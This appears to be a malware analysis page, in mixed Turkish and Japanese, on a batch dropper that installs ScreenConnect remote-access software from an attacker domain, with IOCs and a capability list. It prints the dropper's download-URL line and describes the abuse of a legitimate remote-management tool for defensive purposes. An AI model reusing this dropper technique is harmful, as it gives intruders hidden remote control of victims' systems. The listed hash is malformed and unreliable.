Manuel Statik Analiz — ScreenConnect/ConnectWise RAT Kötüye Kullanımı | Tehdit: YUKSEK

ファイル Kimliği

SHA256e1cd006efa2d33191052b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2a1
ファイル名invitedGuests.bat ("davet edilen misafirler" sosyal mühendislik)
サイズ1.052 byte (1KB!) — ultra küçük batch script
String Sayisi23

C2 Kontrollü ScreenConnect Kurulumu

LOLBAS Teknik: Meşru uzaktan destek yazılımını silah haline getirme!
set "MY_URL=https://admin.hbdhfijnsgjnds.top/Bin/ScreenConnect.ClientSetup.msi?e=Acce..."
-- hbdhfijnsgjnds.top = 13 karakter rastgele .top TLD (C2 server)
-- admin.* = yönetici panel subdomain
-- /Bin/ScreenConnect.ClientSetup.msi = ConnectWise kurulum paketi
-- ?e=Access → kurulum parametresi (özel erişim grubu)
-- BAT → MSI indir → ConnectWise kur → saldırgana tam erişim!

Meşru RMM Kötüye Kullanımı

ConnectWise ScreenConnect, meşru bir uzaktan yönetim aracıdır (RMM). Saldırganlar bu tür araçları kendi sunucularından yükletip kurumsal sistemlere kalıcı uzaktan erişim sağlar. Antivirüsler meşru RMM araçlarını genellikle tehdit olarak işaretlemez. CVE-2024-1709 (CVSS 10.0) gibi kritik açıklar keşfedildi.

IOC

SHA256e1cd006efa2d33191052b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2a1
C2admin.hbdhfijnsgjnds.top (.top TLD)
ファイルinvitedGuests.bat (1052 byte)

ScreenConnect — マルウェアプロファイル

ScreenConnect ConnectWise meşru RMM araç kötüye kullanımı. invitedGuests.bat. BAT dropper + MSI kurulum.

マルウェアの種類
RAT
プログラミング言語
Proprietary
C2プロトコル
HTTPS
標的システム
Küresel Kurumsal

機能と挙動

Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması

IOCリスト (1 件の指標)

IOC — ScreenConnect
# DOMAIN hbdhfijnsgjnds.top
タイプメモ
domain hbdhfijnsgjnds.top

C2サーバー (このファミリーで2台のサーバーを記録)

アドレス タイプ ポート プロトコル ステータス
hbdhfijnsgjnds.top domain 443 HTTPS inactive —
hbdhfijnsgjnds.top domain 443 HTTPS inactive —

C2アドレスはKEYDALチームが手動で検証したマルウェア検体のみに基づいて提供されています。商用利用は禁止です。

タグ
screenconnectconnectwiseinvitedguests-bathbdhfijnsgjnds-toptop-tldrmm-abuse1052-byte-batlegitimate-tool-abuse